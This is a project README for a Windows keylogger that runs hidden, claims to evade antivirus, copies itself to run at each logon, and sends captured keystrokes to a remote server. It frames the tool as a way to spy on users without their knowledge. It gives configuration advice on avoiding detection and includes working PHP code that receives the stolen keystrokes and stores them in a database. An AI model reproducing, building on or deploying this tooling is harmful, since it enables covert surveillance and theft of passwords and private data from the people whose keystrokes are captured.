SimpleKeyLogger
==============


Description
-----------

SimpleKeyLogger is a program which works like a tape recorder running in hidden mode on Microsoft Windows. It runs hidden in the background and automatically records almost all keystrokes. This key-logger is very small in size, has low system requirements, is undetectable by antivirus and is able to send all recorded data to a server. 


License
-------

SimpleKeylogger is released under [GPL version 2][0].


Requeriments
------------

Initially, this program was developed and tested on Windows 7 sp1. As the idea is that the keylogger is built in a single small file, I do not distribute it as a compiled version. In fact, I recommend that you modify the code to adjust some settings and customize the program behaviour according to your need. Therefore, I recommend that you install the latest version of Visual Studio or Visual Studio Express to build the executable. 

For the first version of this project, I used Visual Studio Express 2012. However, it is strongly recommended that you convert the project to the latest version of Visual Studio, because I will make future changes in code to use resources present only in newer versions of Windows.

In the next section is explained how you should modify the source to customize the program according to your intentions.


Download
--------

You can download the sources directly from the repository [http://bitbucket.org/kuraiev/simplekeylogger][1] or use mercurial

> `hg clone https://bitbucket.org/kuraiev/simplekeylogger`
> 


Configuration and Customization
-------------------------------

After download the Visual Studio project, you must modify the `Constants.h` file. The main constants that you must modify are:

* `DEBUG`: This constant is used for pre-compilation steps. If it is set to 1, the keylogger runs in a terminal. Use this configuration when you are developing or modifying the code. If this variable is set to 0, the executable runs invisibly. Use `DEBUG=0` when you want to record the pressed keys without the user knowing.
* `MAX_FILESIZE_TO_SEND`: This constant define the maximum filesize in bytes. When SimpleKeylogger captures the pressed keys, it saves into a random file. When the file reaches the size defined in this constant, the SimpleKeyLogger sends the file content to the remote server. If the server receives content successfully, SimpleKeyLogger creates a new hidden file and repeat the process. Therefore, choosing the maximum file size is crucial. If you choose a very high value, the request will be slow and it may cause some lost in keystrokes or the server may not complete the request. On the other hand, if you choose a very low value, the SimpleKeyLogger will cause an overhead on the network and it will be more easily detected (if the user is sniffying network, for example). I recommend you keep this value between 4000 (4KB) and 10000 (10KB).
* `REMOTE_SERVER`: The value of this constant corresponds to the server address where the SimpleKeyLogger send the collected data. Configure a remote server to collect the pressed keys by the user you are spying. In the next section there is a small PHP code that you can use on the server.
* `REMOTE_SERVER_PROCESS_URI`: This constant defines the resource identifier that receives the sent data as a POST request. For example, if your domain is `www.exploit.tk` and you use `index.php` to receive the request, you can set this variable as `REMOTE_SERVER_PROCESS_URI="/"` or `REMOTE_SERVER_PROCESS_URI="index.php"`. However, if you use `nonindex.php` to receive the posted data, you must set `REMOTE_SERVER_PROCESS_URI="nonindex.php"`
* `REMOTE_SERVER_VARIABLES`: As the name suggests, it defines the POST variables. Check the server-side PHP code in next section.


## Server-side Code to Receive the Logger Keystrokes

The code below is very simple. It receives the content of the variables defined in `REMOTE_SERVER_VARIABLES`, get the IP from request and store this triple in a database.

In the published code, the variable `REMOTE_SERVER_VARIABLES` is set as `"machine=%s&content=%s&submit=Submit"`. Thus, your server-side code must receive both variables `machine` and `content`.

    
    function getClientIp() {
         $ipaddress = '';
         if (getenv('HTTP_CLIENT_IP'))
             $ipaddress = getenv('HTTP_CLIENT_IP');
         else if(getenv('HTTP_X_FORWARDED_FOR'))
             $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
         else if(getenv('HTTP_X_FORWARDED'))
             $ipaddress = getenv('HTTP_X_FORWARDED');
         else if(getenv('HTTP_FORWARDED_FOR'))
             $ipaddress = getenv('HTTP_FORWARDED_FOR');
         else if(getenv('HTTP_FORWARDED'))
            $ipaddress = getenv('HTTP_FORWARDED');
         else if(getenv('REMOTE_ADDR'))
             $ipaddress = getenv('REMOTE_ADDR');
         else
             $ipaddress = 'UNKNOWN';
    
         return $ipaddress; 
    }
    
    function saveInDb($ip, $machine, $content) {
        $dbPasswd = "yourDbPassword";
        $dbHost = "yourDbHost";
        $dbUser = "yourDbUser";
        $dbName = "yourDbName";
        try {
            $link = new PDO("mysql:host=${dbHost};dbname=${dbName}", $dbUser, $dbPasswd);
            $handle = $link->prepare("INSERT INTO storage (ip, machine, content) VALUES (:ip, :machine, :content);");
            $data = array(":ip" => $ip, ":machine" => $machine, ":content" => $content);
            $handle->execute($data);
        } catch (PDOException $pex) {
            echo $pex->getMessage();
        }
    }
    
    
    $ip = getClientIp();
    $content = $_REQUEST["content"];
    $machineName = $_REQUEST["machine"];
    saveInDb($ip, $machineName, $content);
    


How to Use
----------

Once compiled SimpleKeyLogger, just run the executable file. As you can check from the source code, after running, the SimpleKeyLogger copies itself to the system and runs every time that user log on.


How to contribute
-----------------

If you want to contribute to this project, please contact by email **sawp@sawp.com.br**.


[0]: http://www.gnu.org/licenses/gpl-2.0.html
[1]: http://bitbucket.org/kuraiev/simplekeylogger
